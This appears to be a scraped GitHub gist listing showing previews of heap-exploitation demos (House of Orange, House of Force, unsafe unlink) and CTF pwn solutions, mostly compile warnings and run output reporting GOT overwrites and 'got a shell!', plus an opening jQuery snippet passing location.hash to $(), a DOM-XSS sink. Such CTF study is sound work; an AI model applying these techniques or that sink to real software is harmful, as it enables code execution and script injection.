This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script> | |
| <script> | |
| $(location.hash.slice(1)); | |
| </script> |
inaz2
/ house_of_orange.c
Last active
December 22, 2017 16:16
House of Orange attack / http://4ngelboy.blogspot.jp/2016/10/hitcon-ctf-qual-2016-house-of-orange.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ gcc house_of_orange.c -o house_of_orange | |
| house_of_orange.c: In function ‘main’: | |
| house_of_orange.c:39:29: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
| *(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */ | |
| ^ | |
| house_of_orange.c:42:30: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
| *(void **)(p1+0x80+0x30) = -1; | |
| ^ | |
| $ ./house_of_orange |
inaz2
/ unsorted_bin.c
Created
October 18, 2016 02:23
unsorted bin attack / https://github.com/shellphish/how2heap
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ gcc unsorted_bin.c -o unsorted_bin | |
| $ ./unsorted_bin | |
| target = 1 | |
| [+] allocate p1, p2, p3 | |
| p1 = 0x1429420 | |
| p2 = 0x14294b0 | |
| p3 = 0x1429550 |
inaz2
/ test.py
Last active
October 18, 2016 08:18
0CTF 2015 Quals CTF freenote (exploit 400) / https://github.com/ctfs/write-ups-2015/tree/master/0ctf-2015/exploit/freenote https://kitctf.de/writeups/0ctf2015/freenote/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python test.py | |
| [+} leak libc and heap address | |
| base_heap = 14e7000 | |
| base_libc = 7f667cdea000 | |
| [+] unsafe unlink attack | |
| [+] got overwrite: free -> system | |
| [+] got a shell! | |
| id | |
| uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) |
inaz2
/ test.py
Created
October 17, 2016 05:10
HITCON CTF 2016 Quals Baby Heap (pwn 300) / https://github.com/ctfs/write-ups-2016/tree/master/hitcon-ctf-2016/pwn/baby-heap-300 http://shift-crops.hatenablog.com/entry/2016/10/11/233559
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python test.py | |
| [+] exploiting off-by-one | |
| [+] got overwrite: _exit -> (ret), atoi -> printf | |
| [+] leak libc address | |
| addr_libc_system = 7fd7a0d79380 | |
| [+] got overwrite: atoi -> system | |
| [+] got a shell! | |
| id | |
| uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) |
inaz2
/ house_of_force.c
Created
October 13, 2016 04:35
House of Force attack / https://github.com/shellphish/how2heap
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ gcc house_of_force.c -o house_of_force | |
| house_of_force.c: In function ‘main’: | |
| house_of_force.c:14:25: warning: assignment makes pointer from integer without a cast [enabled by default] | |
| *(void **)(p1+0x48) = -1; | |
| ^ | |
| $ ./house_of_force | |
| &p = 0x601050 | |
| p3 = 0x601050 | |
| jackpot! |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ gcc test.c -o test | |
| $ ./test | |
| p1 = 0x7f26cff90010 | |
| p2 = 0x238d010 | |
| p3 = 0x248d020 | |
| p4 = 0x258d030 |
inaz2
/ test.py
Last active
October 13, 2016 10:12
HITCON CTF 2016 Quals Secret Holder (pwn 100) / https://github.com/ctfs/write-ups-2016/tree/master/hitcon-ctf-2016/pwn/secret-holder-100 http://shift-crops.hatenablog.com/entry/2016/10/11/233559
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python test.py | |
| [+] unsafe unlink attack | |
| [+] GOT overwrite to ROP | |
| [+] leak libc address | |
| [+] execute system('/bin/sh') | |
| [+] got a shell! | |
| id | |
| uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) |
inaz2
/ unsafe_unlink.c
Created
October 13, 2016 01:54
unsafe unlink attack / https://github.com/shellphish/how2heap
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ gcc unsafe_unlink.c -o unsafe_unlink | |
| unsafe_unlink.c: In function ‘main’: | |
| unsafe_unlink.c:25:24: warning: assignment makes pointer from integer without a cast [enabled by default] | |
| *(void **)(p+0x40) = 0x40; | |
| ^ | |
| unsafe_unlink.c:26:24: warning: assignment makes pointer from integer without a cast [enabled by default] | |
| *(void **)(p+0x48) = 0x90; | |
| ^ | |
| unsafe_unlink.c:37:24: warning: assignment makes pointer from integer without a cast [enabled by default] | |
| *(void **)(p+0x18) = 0x601028; /* printf@got */ |
inaz2
/ gist:8a529f29f9c4d765e6263b701191fe1d
Created
October 12, 2016 01:52
using qemu-user-static for branch tracing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ qemu-x86_64-static -d exec /bin/ls 2>&1 >/dev/null | head -n40 | |
| host mmap_min_addr=0x10000 | |
| Reserved 0x21c000 bytes of guest address space | |
| Relocating guest address space from 0x0000000000400000 to 0x400000 | |
| guest_base 0x0 | |
| start end size prot | |
| 0000000000400000-000000000041a000 000000000001a000 r-x | |
| 0000000000619000-000000000061c000 0000000000003000 rw- | |
| 0000004000000000-0000004000001000 0000000000001000 --- | |
| 0000004000001000-0000004000801000 0000000000800000 rw- |